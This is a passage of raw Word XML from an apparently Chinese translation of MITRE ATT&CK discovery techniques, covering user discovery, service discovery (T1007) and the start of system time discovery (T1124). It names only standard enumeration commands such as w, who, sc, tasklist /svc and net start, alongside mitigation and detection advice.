        <w:t>目录的所有权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话信息和系统日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C097C03" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E72F58" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ma</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可用来识别当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A101BE8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070B846D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE06D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可用来</w:t>
      </w:r>
      <w:r>
        <w:t>识别当前登录用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE407B6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A08C136" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE90444" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225581C4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005A7988" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常用在攻击者试图了解环境的整个操作</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560069B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005A7988" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具来直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA5050" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="2DFA161D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B17C509" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1007</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49EEB80B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66176CAA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB09A77" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31227F81" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13823B27" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId187" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="007526C7">
                <w:t>CAPEC-574</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0623FEFE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E2F2715" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007364D2" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FB3496" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可能会尝试获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>注册服务的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作系统实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
          </w:rPr>
          <w:t>Tasklist</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="4F7CAC"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>tasklist /svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
          </w:rPr>
          <w:t>Net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="4F7CAC"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>net start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可用于获取服务信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>使用其他工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>获取服务信息</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1DE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D1DF5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21131413" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F5EF19" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE275E3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005A7988" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常用在攻击者试图了解环境的整个操作</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D15D34" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00541EF1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具来直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7988">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F188A1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="1D62B26B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2513622E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1124</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AA4271" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C3F10B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290326E9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78F89268" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731590D8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
